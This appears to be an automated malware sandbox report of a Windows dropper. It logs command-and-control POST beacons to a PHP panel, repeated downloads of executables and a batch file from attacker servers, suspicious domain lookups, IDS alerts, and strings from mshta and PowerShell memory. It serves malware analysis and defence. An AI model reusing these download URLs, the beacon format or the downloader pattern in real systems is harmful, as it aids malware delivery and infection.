Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: GET /files/98210354/SvhQA35.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 30 32 33 37 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10102370101&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/6334933365/ce4pMzk.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 30 34 39 30 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10104900101&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/7868598855/zY9sqWs.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 30 36 34 37 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10106470101&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /test/exe/random.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 30 36 36 37 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10106670101&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 176.113.115.7Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /test/am_no.bat HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 30 36 36 38 30 31 32 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10106680121&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/unique2/random.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 176.113.115.7Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 30 36 37 32 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10106720101&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/fate/random.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 30 36 37 33 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10106730101&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/martin2/random.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 176.113.115.7Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 30 36 37 34 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10106740101&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/qqdoup/random.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 30 36 37 35 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10106750101&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 176.113.115.7Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/6003232782/PcAIvJ0.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 30 36 37 36 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10106760101&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 176.113.115.7Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 30 36 37 38 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10106780101&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 30 36 37 39 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10106790101&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 30 36 38 30 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10106800101&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 176.113.115.7

Source: Joe Sandbox View	IP Address: 176.113.115.7 176.113.115.7
Source: Joe Sandbox View	IP Address: 176.113.115.6 176.113.115.6

Source: Joe Sandbox View	ASN Name: SELECTELRU SELECTELRU
Source: Joe Sandbox View	ASN Name: SELECTELRU SELECTELRU
Source: Joe Sandbox View	ASN Name: SIMPLECARRIERCH SIMPLECARRIERCH
Source: Joe Sandbox View	ASN Name: RELDAS-NETRU RELDAS-NETRU

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49748 -> 176.113.115.7:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49783 -> 176.113.115.7:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49806 -> 176.113.115.7:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49798 -> 176.113.115.7:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49821 -> 176.113.115.7:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49834 -> 176.113.115.7:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49849 -> 176.113.115.7:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49856 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49869 -> 176.113.115.7:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49863 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49877 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49888 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49897 -> 176.113.115.7:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49906 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49905 -> 104.73.234.102:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49898 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49915 -> 104.21.24.225:443
Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49919 -> 45.144.212.77:16000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49914 -> 176.113.115.7:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49918 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49925 -> 104.21.24.225:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49932 -> 176.113.115.7:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49933 -> 104.21.24.225:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49938 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49943 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49948 -> 104.21.24.225:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49955 -> 176.113.115.7:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49956 -> 104.21.24.225:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49957 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49962 -> 104.21.24.225:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49967 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49973 -> 176.113.115.7:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49975 -> 104.21.24.225:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49983 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49993 -> 176.113.115.7:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49965 -> 45.93.20.28:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49996 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50000 -> 104.21.24.225:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49991 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49984 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50031 -> 104.21.16.1:443

Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7

Source: C:\Users\user\Desktop\5c9465cda4.exe

Code function: 0_2_00AECE44 InternetReadFile,SetEvent,GetLastError,SetEvent,

0_2_00AECE44

Source: global traffic	HTTP traffic detected: GET /dl/21790868/joblam.exe HTTP/1.1Host: tmpfiles.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /dl/21790868/joblam.exe HTTP/1.1Host: tmpfiles.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 176.113.115.7Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/98210354/SvhQA35.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: GET /files/6334933365/ce4pMzk.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: GET /files/7868598855/zY9sqWs.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: GET /test/exe/random.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 176.113.115.7Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /test/am_no.bat HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: GET /files/unique2/random.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 176.113.115.7Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/fate/random.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: GET /files/martin2/random.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 176.113.115.7Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/qqdoup/random.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 176.113.115.7Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/6003232782/PcAIvJ0.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 176.113.115.7Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 176.113.115.7

Source: global traffic	DNS traffic detected: DNS query: exarthynature.run
Source: global traffic	DNS traffic detected: DNS query: tmpfiles.org
Source: global traffic	DNS traffic detected: DNS query: dawtastream.bet
Source: global traffic	DNS traffic detected: DNS query: foresctwhispers.top
Source: global traffic	DNS traffic detected: DNS query: tracnquilforest.life
Source: global traffic	DNS traffic detected: DNS query: collapimga.fun
Source: global traffic	DNS traffic detected: DNS query: seizedsentec.online
Source: global traffic	DNS traffic detected: DNS query: strawpeasaen.fun
Source: global traffic	DNS traffic detected: DNS query: quietswtreams.life
Source: global traffic	DNS traffic detected: DNS query: starrynsightsky.icu
Source: global traffic	DNS traffic detected: DNS query: earthsymphzony.today
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: farmingtzricks.top
Source: global traffic	DNS traffic detected: DNS query: croprojegies.run
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: youtube.com
Source: global traffic	DNS traffic detected: DNS query: detectportal.firefox.com
Source: global traffic	DNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: contile.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: spocs.getpocket.com
Source: global traffic	DNS traffic detected: DNS query: prod.ads.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: prod.balrog.prod.cloudops.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: content-signature-2.cdn.mozilla.net
Source: global traffic	DNS traffic detected: DNS query: prod.content-signature-chains.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: shavar.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: shavar.prod.mozaws.net
Source: global traffic	DNS traffic detected: DNS query: push.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: firefox.settings.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: prod.remote-settings.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: telemetry-incoming.r53-2.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: ipv4only.arpa
Source: global traffic	DNS traffic detected: DNS query: example.org
Source: global traffic	DNS traffic detected: DNS query: www.youtube.com
Source: global traffic	DNS traffic detected: DNS query: www.facebook.com
Source: global traffic	DNS traffic detected: DNS query: www.wikipedia.org
Source: global traffic	DNS traffic detected: DNS query: star-mini.c10r.facebook.com
Source: global traffic	DNS traffic detected: DNS query: youtube-ui.l.google.com
Source: global traffic	DNS traffic detected: DNS query: dyna.wikimedia.org
Source: global traffic	DNS traffic detected: DNS query: www.reddit.com
Source: global traffic	DNS traffic detected: DNS query: twitter.com
Source: global traffic	DNS traffic detected: DNS query: reddit.map.fastly.net

Source: unknown

HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Mar 2025 21:01:13 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: no-cache, privateCF-Cache-Status: BYPASSSet-Cookie: XSRF-TOKEN=eyJpdiI6IkpvQXloaEZJRVAxRG8rbU9TMzNrQVE9PSIsInZhbHVlIjoibnoraWVOa2JieFI2c1FVd3krY2Q5d3RMOFpiVm1LTXJ6YVU2SXM0QVpCRCt6K1B3bTB0OUthQVpsem9lMEp5V3BQU0hnanRtcDZHdEs5ejhRd01abXIrNUtXc3NIQlVqOTBrQmE1Z201alhEdmJXMUVmOXVYMDlFUlFoamJEWi8iLCJtYWMiOiIwMmQ5OGVhYzFmMDk0OTc4MmQ5ZGFiZTFmMzFlOTI1MzJlNzU1Yzk3YWIxNjFiZmE1YTE0YWE5MmUzOWJlYzU3In0%3D; expires=Wed, 05-Mar-2025 23:01:13 GMT; Max-Age=7200; path=/; samesite=laxSet-Cookie: tmpfiles_session=eyJpdiI6IkR2T1Zsc2haemZLTGRxNDBoeFpZT0E9PSIsInZhbHVlIjoidGMvREhyR0kyKzNuNTFhRUlyT3FKS0E0cHk2SnYxSnlTd29VNDc1QWxPemIxNWMrb2xuWUExNkdIc1VVWUVramFsQ0o5SlA3bUg0VUEyNjdRSXRVdkFLQVhURi8yeEtoakljK2hZcGUxYW9GV1BQVmdDWGlMUkVackZGR3ZCL3QiLCJtYWMiOiI5MTVlOThhYjM2MThlMzYwYTlhYTlhOWRiNjhkMzk1OTI1MGYzNTE0ZTE4Y2ZkODgwYTNlM2IzNzA4OTcwYjI1In0%3D; expires=Wed, 05-Mar-2025 23:01:13 GMT; Max-Age=7200; path=/; httponly; samesite=laxReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vC17%2B3IWIKdHy%2Bqrgk3c9L7DLnRtS%2BK4dZDEjeNqUnBI7RlAZrpEU1DA9QAaOEXqMzGsM8lDU%2BZD%2FasIx9UnTYu0O3zQrnyljcK2Z09KNWsMPogS0cAgnggGDbeRiso%3D"}],"group":"cf-nel","max_age":604800}
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Mar 2025 21:01:32 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: no-cache, privateCF-Cache-Status: BYPASSSet-Cookie: XSRF-TOKEN=eyJpdiI6InhoRXhKOWR1ZGZOUlRvNUgydnpHL0E9PSIsInZhbHVlIjoidEw0cEYwOUZGNTUrKzhLQ0UyeVM3cjFYZW9OT3BrcjdzbHBKZVBsSXg3NmYxaEN2NkpJSmVZUllmMVc4RUJwdFo1R1VPaTR4QzBBbTVpNitZWTlFRGVMNkd4cjI3NEFvS3A3MGlaM2phTE43OUZLT21ZUUlINmk4LzNkcmVlV0IiLCJtYWMiOiI4MTg1OTc1YTFkMjkzNDEzYWJmOWZiNDE3NDUwZDdiN2Y0OGEyOGI1NjJhY2I0OGE3ZjNlMDAyYmY4YTlhOWM1In0%3D; expires=Wed, 05-Mar-2025 23:01:32 GMT; Max-Age=7200; path=/; samesite=laxSet-Cookie: tmpfiles_session=eyJpdiI6IjYxbFVtbVZuTW5NNnFZNlFycnd0cUE9PSIsInZhbHVlIjoidFVCbmFZVHRPWG5Ldm5lcHJIdlJBdVdJY3d2R3pNNnVPbnVQbEZ5d2lFcCt1akFJSTVFSFNmcU1IZ2FkZm8vRDlMeEI3NXpCcFhCeXJIWGpmb1o0dFdmdEdCSzBES0FDZ2hNVDhzYWdZNi9TVWlNOHBDTFhwak15bG1heTJpM1YiLCJtYWMiOiI5M2NiOWExNzZkMzUwOThlMTRlZjFjZTVkNmZlYWUxNjNiODY4MTg4MTM0MDJlMjI4NmExYTJlZWJlZTAyZjc1In0%3D; expires=Wed, 05-Mar-2025 23:01:32 GMT; Max-Age=7200; path=/; httponly; samesite=laxReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NeGoel2ztjmF3pBAtLhekksK9vnFolcHNPRLHiHC47eEXHLngFLroB6rl21eVTS3T7NCK5rlB%2BNWrQ%2FT9vRpmWYiLk7tA8jjcb4ZDRJhYkHEodOBvpXwuob0wYIogBQ%3D"}],"group":"cf-nel","max_age":604800}

Source: chromium.exe, 0000001B.00000002.2544410269.000001D12764B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:9222/json
Source: mshta.exe, 00000002.00000003.1672677775.0000000002D2F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1674411015.0000000002D2F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1671135040.0000000002D2F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1708938905.0000000004819000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7
Source: powershell.exe, 00000008.00000002.1770913315.000001F321C71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1770352396.000001F31FFC0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000025.00000002.2618156081.0000000000817000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/mine/random.exe
